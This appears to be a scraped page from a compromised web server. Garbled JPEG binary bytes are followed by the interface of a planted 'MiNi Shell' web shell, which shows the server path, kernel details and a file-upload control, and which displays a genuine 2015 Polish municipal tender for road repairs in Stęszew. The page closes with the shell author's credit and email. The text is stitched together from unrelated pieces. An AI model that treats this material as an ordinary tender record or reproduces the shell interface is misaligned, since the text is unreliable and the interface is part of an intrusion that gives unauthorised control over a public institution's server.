JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150806/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150806/200752-N-2015.html

<p class="kh_header"><b>Stęszew: Przedmiotem zamówienia jest remont jezdni na terenie gminy Stęszew z materiału Wykonawcy</b><br>
<b>Numer ogłoszenia: 200752 - 2015; data zamieszczenia: 06.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Stęszew , ul. Poznańska 11, 62-060 Stęszew, woj. wielkopolskie, tel. 8197141.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.steszew.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest remont jezdni na terenie gminy Stęszew z materiału Wykonawcy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest remont jezdni na terenie gminy Stęszew z materiału Wykonawcy
Zakres prac obejmuje roboty budowlano montażowe polegające na:

Remont jezdni ul. Jeziornej w Słupii

1	ROBOTY PRZYGOTOWAWCZE I ROZBIÓRKOWE	 	 
1.1	Roboty pomiarowe przy liniowych robotach ziemnych. 	km	- 0,259
1.2	Rozebranie krawężników betonowych o wymiarach 15x30 cm.	m	- 147,000
1.3	Rozebranie ław z betonu pod krawężniki.	m3	- 10,290
1.4	Rozebranie obrzeży o wymiarach 8x30 cm.	m	- 84,300
1.5	Rozebranie nawierzchni z płyt drogowych betonowych (wjazdy).	m2	- 59,300
1.6	Rozebranie chodników, z płyt bet. 35x35x5 cm.	m2	- 153,340
1.7	Frezowanie nawierzchni asfaltowych.	100 m2	- 14,170
1.8	Załadunek i wywóz materiałów z rozbiórki.	m3	- 33,474
2	ROBOTY ZIEMNE	 	 
2.1	Wykonywanie koryt na całej szerokości jezdni i chodników. 	m2	- 191,640
2.2	Rowki pod krawężniki i ławy krawężnikowe o wym. 40x40 cm.	m	- 244,800
2.3	Załadunek i wywóz ziemi.	m3	- 77,496
3	KRAWĘŻNIKI, OPORNIKI	 	 
3.1	Ławy betonowe z oporem pod krawężniki o wym. 25 x 35 cm.	m3	- 10,290
3.2	Krawężniki betonowe wystające o wymiarach 15x30.	m	- 113,000
3.3	Krawężniki betonowe wtopione o wymiarach 15x30 cm.	m	- 34,000
3.4	Ławy betonowe pod opornik zwykłe.	m3	- 3,912
3.5	Obrzeża betonowe o wymiarach 30x8 cm.	m	- 97,800
4	PODBUDOWY I NAWIERZCHNIE	 	 
4.1	Mechaniczne oczyszczenie nawierzchni drogowych.	m2	- 1 416,950
4.2	Skropienie nawierzchni drogowych emulsją asfaltową.	m2	- 1 416,950
4.3	Wyrównanie nawierzchni na śr. gr. 3 cm bet. asfalt. AC 16W.	t	- 108,000
4.4	Mechaniczne oczyszczenie nawierzchni drogowych.	m2	- 1 416,950
4.5	Skropienie nawierzchni drogowych emulsją asfaltową.	m2	- 1 416,950
4.6	Ułożenie warstwy ścieralnej gr. 4 cm z bet. asfalt.  AC 11S.	m2	- 1 416,950
5	CHODNIKI I WJAZDY	 	 
5.1	Podbudowy betonowe gr. 12 cm.	m2	- 59,300
5.2	Wjazdy z kostki brukowej betonowej gr. 8 cm, kolorowej.	m2	- 59,300
5.3	Chodniki z kostki brukowej betonowej gr. 6 cm, szarej.	m2	- 153,340
6	ROBOTY UZUPEŁNIAJĄCE	 	 
6.1	Regulacja pionowa studzienek - włazów kanałowych.	szt.	- 7,000
6.2	Regulacja pionowa studzienek - zaworów wodociąg.	szt.	- 3,000
6.3	Naprawy poboczy wykonane ręcznie - plantowanie.	m2	- 267,300

Remont jezdni ul. Kościańskiej na odcinku od ul. Błonie do ul. Kórnickiej

1	Roboty przygotowawcze i rozbiórkowe	 	 
1.1	Roboty pomiarowe przy liniowych robotach ziemnych.	km	- 0,33
1.2	Rozebranie nawierzchni z kostki brukowej betonowej.	m2	- 106,59
1.3	Rozebranie obrzeży trawnikowych o wymiarach 6x20 cm.	m	- 140,40
1.4	Rozebranie krawężników betonowych o wymiarach 20x30 cm.	m	- 36,00
1.5	Rozebranie ław z betonu pod krawężniki.	m3	- 2,50
1.6	Wywóz materiałów z rozbiórki.	t	- 25,441
1.7	Frezowanie nawierzchni asfaltowych, na gł. 3 cm.	100 m2	- 33,471
2	Roboty nawierzchniowe	 	 
2.1	Mechaniczne oczyszczenie nawierzchni drogowych.	m2	- 3 394,725
2.2	Skropienie nawierzchni drogowych asfaltem	m2	- 3 394,725
2.3	Nawierzchnia z betonu asfaltowego AC 11 S o gr. 5 cm	m2	- 3 109,525
3	Krawężniki i ścieki	 	 
3.1	Ławy betonowe z oporem pod krawężniki i oporniki.	m3	- 4,83
3.2	Przestawienie krawężników betonowych 15x30 cm.	m	- 36,00
3.3	Obrzeża betonowe o wymiarach 30x8 cm.	m	- 77,00
4	Wjazdy i chodniki	 	 
4.1	Przestawienie obrzeży betonowych o wymiarach 30x8 cm.	m	- 36,00
4.2	Przełożenie nawierzchni wjazdów z kostki o wysokości 8 cm.	m2	- 56,00
4.3	Mechaniczne wykonywanie koryt głębokość 20 cm.	m2	- 16,34
4.4	Koryta wykonywane ręcznie, o głębokości 10 cm.	m2	- 116,80
4.5	Załadunek i wywóz gruntu.	m3	- 14,948
4.6	Podbudowy betonowe grubości 12 cm.	m2	- 16,34
4.7	Chodnik z kostki brukowej o gr. 6 cm, szarej.	m2	- 105,12
4.8	Chodnik z kostki brukowej betonowej o gr. 6 cm, kolorowej.	m2	- 11,68
4.9	Wjazdy do bram z kostki brukowej betonowej o gr. 8 cm, kolorowej.	m2	- 16,34
5	Odwodnienie	 	 
5.1	Ławy betonowe z oporem pod krawężniki.	m3	- 0,84
5.2	Krawężniki betonowe wystające o wymiarach 15x30 cm.	m	- 12,00
5.3	Ścieki z elementów betonowych.	m	- 8,00
5.4	Chodniki z płyt betonowych o wymiarach 50x50x7 cm.	m2	- 3,00
6	Roboty inne	 	 
6.1	Regulacja pionowa studzienek - włazów kanałowych.	szt.	- 24,00
6.2	Regulacja pionowa studzienek - kratek ściekowych ulicznych.	szt.	- 10,00
6.3	Regulacja pionowa studzienek - zaworów wodociągowych i gazowych.	szt.	- 4,00
6.4	Regulacja pionowa studzienek - studzienek telefonicznych.	szt.	- 4,00
6.5	Ręczne rozrzucenie ziemi.	ha	- 0,012
6.6	Wykonanie trawników.	m2	- 11,68

Remont jezdni ul. Kościańskiej na odcinku Laskowa - Polna

1	Roboty przygotowawcze i rozbiórkowe	 	 
1.1	Roboty pomiarowe przy liniowych robotach ziemnych.	km	- 0,11
1.2	Frezowanie nawierzchni asfaltowych na głębokość 5 cm. 	100 m2	- 7,26
2	Roboty nawierzchniowe	 	 
2.1	Mechaniczne oczyszczenie nawierzchni drogowych.	m2	- 770,00
2.2	Skropienie nawierzchni drogowych asfaltem.	m2	- 770,00
2.3	Nawierzchnia z betonu asfaltowego AC 11 S gr. 5 cm. 	m2	- 770,00
3	Roboty inne	 	 
3.1	Regulacja pionowa studzienek - włazów kanałowych.	szt.	- 3,00
3.2	Regulacja pionowa studzienek - kratek ściekowych ulicznych.	szt.	- 7,00
3.3	Regulacja pionowa studzienek - zaworów wodociągowych i gazowych.	szt.	- 4,00

Remont ulicy Łąkowej w m. Wronczyn
Roboty pomiarowe przy liniowych robotach                                                                                                        ziemnych (drogi)							                                km	        0,120
Frezowanie nawierzchni asfaltowych na zimno, na głębokość 3 cm	                                m2	      18,000
Mechaniczne cięcie szczelin w nawierzchniach z mas                                                                                   mineralno-bitumicznych, głębokość cięcia 5 cm				                  m	        6,000
Mechaniczne profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni m2	    720,000
Mechaniczne oczyszczenie nawierzchni drogowych nieulepszonych	                                m2	    720,000
Skropienie nawierzchni drogowych asfaltem				                                m2          720,000
Warstwa wiążąca o grubości po zagęszczeniu 3 cm			                                m2          720,000
Mechaniczne oczyszczenie nawierzchni drogowych ulepszonych z bitumu	                  m2	     738,000
Skropienie nawierzchni drogowych asfaltem				                                m2	     738,000
Warstwa ścieralna o grubości po zagęszczeniu 4 cm			                                 m2	     738,000
Roboty ziemne								                   m3	       45,000
Zasypywanie wykopów szerokości 0,8 - 2,5 m o ścianach pionowych	                                 m3	       41,269
Podłoża o grubości 15 cm z materiałów sypkich				                   m2	       21,000
Studzienki ściekowe uliczne betonowe z osadnikiem bez syfonu		                   szt.	         4,000
Przykanaliki z rur PVC kielichowych o średnicy nominalnej 200 mm	                                 m	       24,000
Regulacja pionowa  włazów kanałowych				                                 szt.	         4,000
Przebicie otworów w ścianach betonowych grubości do 15 cm		                                 szt.	         4,000

Pozostałe prace zgodnie z przedmiarem robót oraz uporządkowanie terenu po zakończonych pracach.

Ponadto zakres prac obejmuje:
1) sporządzenie operatu kolaudacyjnego - 3 egzemplarze, na który składa się:
   a) Dokumentacja powykonawcza:
     b) Obsługa geodezyjna zadania wraz z inwentaryzacją  powykonawczą -  mapy     kpl.   5,000
     c) Atesty na materiały i prefabrykaty,
 2) Protokóły odbioru robót.
 3) wymagane dokumenty dotyczące przeprowadzonych przez Wykonawcę badań i sprawdzeń,.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.23-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.11.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie złożonych 
przez Wykonawcę oświadczeń i dokumentów.
Z treści załączonych dokumentów musi jednoznacznie wynikać, że Wykonawca spełnia wymagane warunki.
Na dowód spełnienia niniejszego warunku Wykonawca zobowiązany jest przedstawić oświadczenie
Z art. 22 ust. 1 ustawy Prawo Zamówień Publicznych ( zał. nr 2 i nr 5 do SIWZ ).
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana w oparciu o informacje zawarte w dokumentach i oświadczeniach dołączonych do oferty, wymaganych przez Zamawiającego</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie złożonych przez Wykonawcę  dokumentów.
Z treści załączonych dokumentów musi jednoznacznie wynikać, że Wykonawca spełnia wymagane warunki.
Na dowód spełniania niniejszego warunku Wykonawca zobowiązany jest przedstawić w wykazie robót budowlanych wykonanie co najmniej jednej roboty budowlanej dotyczącej budowy lub remontu nawierzchni jezdni z betonu asfaltowego oraz budowy lub remontu chodnika z kostki brukowej
( załącznik Nr 4 do SIWZ )
      Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana w oparciu o informacje zawarte w dokumentach dołączonych do oferty, wymaganych przez Zamawiającego</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie złożonych 
przez Wykonawcę oświadczeń i dokumentów.
Z treści załączonych dokumentów musi jednoznacznie wynikać, że Wykonawca spełnia wymagane warunki.
Na dowód spełnienia niniejszego warunku Wykonawca zobowiązany jest przedstawić oświadczenie
Z art. 22 ust. 1 ustawy Prawo Zamówień Publicznych ( zał. nr 5 do SIWZ ).
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana w oparciu o informacje zawarte w dokumentach i oświadczeniach dołączonych do oferty, wymaganych przez Zamawiającego</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny na podstawie załączonego do oferty dokumentu.
Na dowód spełnienia niniejszego warunku Wykonawca zobowiązany jest przedstawić oświadczenie
Z art. 22 ust. 1 ustawy Prawo Zamówień Publicznych ( zał. nr 2  do SIWZ ).
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana w oparciu o informacje zawarte w dokumentach i oświadczeniach dołączonych do oferty, wymaganych przez Zamawiającego</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Wykonawca zobowiązany jest przedstawić w wykazie robót budowlanych wykonanie co najmniej jednej roboty budowlanej dotyczącej budowy lub remontu nawierzchni jezdni z betonu asfaltowego oraz budowy lub remontu chodnika z kostki brukowej ( załącznik Nr 4 do SIWZ );</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.  Formularz oferty z oferowaną ceną netto i brutto wraz z kosztorysem ofertowym.
     Uwaga: Zaleca się wykorzystanie przekazanego formularza oferty. 
     Dopuszcza się formularz oferty przygotowany przez Wykonawcę pod warunkiem,  że będzie 
     on zgodny co do treści z formularzem określonym przez Zamawiającego.
     Dołączenie do oferty formularza o innej treści niż określony w SIWZ oraz niewypełnienie   
     wszystkich pozycji formularza ofertowego skutkować może odrzuceniem oferty.
2.  Oświadczenie, że Wykonawca spełnia warunki zawarte w art. 22 ust. 1 ustawy Prawo zamówień 
     publicznych.
3.  Wykonawca musi pisemnie wskazać w ofercie części zamówienia, której wykonanie powierzy 
      podwykonawcom.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - Gwarancja - 3</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Terminy wykonania zadania przedłuża się: 
1)	niesprzyjające warunki atmosferyczne nie pozwalające na realizację robót dla których określona odpowiednimi normami technologia wymaga właściwych warunków atmosferycznych, 
2)	wystąpienia okoliczności, których strony nie były w stanie przewidzieć, pomimo zachowania należytej staranności,
    Przedłużenie terminu wykonania robót nastąpi o tyle dni, ile trwała przeszkoda w ich wykonaniu  
    bez możliwości ubiegania się o odszkodowanie przez Wykonawcę. 
    Podstawą do przesunięcia terminu jest wniosek Wykonawcy o przedłużenie terminu realizacji 
    zadania, zatwierdzony przez  Zamawiającego
2. Zmiana i wprowadzenie dodatkowych Podwykonawców:
1)	których udział w realizacji przedmiotu umowy zaakceptował Zamawiający.
2)	wprowadzenie dodatkowych Podwykonawców 
    Wykonawca może wprowadzić Podwykonawcę na teren budowy/robót po spełnieniu warunku 
    uzyskania akceptacji  Zamawiającego.    
3. Zamawiający nie przewiduje udzielenia zamówień uzupełniających, a ewentualne zamówienia
    dodatkowe zostaną udzielone zgodnie z ustawą Prawo zamówień publicznych.
4. Uzasadnieniem może być jedynie:
1)	prawidłowa realizacja przedmiotu umowy,
2)	zapewnienie jakości 
3)	obniżenie kosztów przy zachowaniu tych samych lub lepszych parametrów technicznych i jakościowych.
Ogólny projekt umowy może ulec modyfikacji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.steszew.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski Gminy Stęszew
62-060 Stęszew ul. Poznańska 11 pokój nr 9 ( po uprzednim zamówieniu ).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.08.2015 godzina 09:00, miejsce: Urząd Miejski Gminy Stęszew
62-060 Stęszew ul. Poznańska 11 pokój nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com